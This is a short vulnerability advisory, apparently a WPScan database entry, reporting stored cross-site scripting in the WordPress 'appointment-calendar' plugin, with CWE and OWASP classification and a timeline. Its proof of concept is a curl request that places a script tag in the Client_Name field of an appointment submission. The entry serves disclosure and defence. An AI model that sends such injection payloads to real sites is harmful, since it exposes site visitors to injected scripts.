Appointment Calendar - Stored Cross-Site Scripting (XSS)

Description

When user submist data from appointments there is no validation which leads to stored XSS.

Proof of Concept

curl 'Path to page where appointments calendar short-code is used' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Host: localhost'  -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0' -H 'X-Requested-With: XMLHttpRequest' --data 'ServiceId=1&AppDate=02-11-2016&StartTime=10:30 AM&Client_Name=<script>alert("hello")</script>&Client_Email=test@test.com&Client_Phone=123456&Client_Note=&Service_Duration=30'

Affects Plugin

appointment-calendar

References

URL	https://wordpress.org/plugins/appointment-calendar/

Classification

Type	XSS
OWASP Top 10	A3: Cross-Site Scripting (XSS)
CWE	CWE-79

Miscellaneous

Submitter	Naeem Shah
Views	658
Verified	No
WPVDB ID	8633

Timeline

Publicly Published	2016-09-30 (about 2 years ago)
Added	2016-10-01 (about 2 years ago)
Last Updated	2018-08-29 (about 2 months ago)

Copyright & License

Copyright	All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License	Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.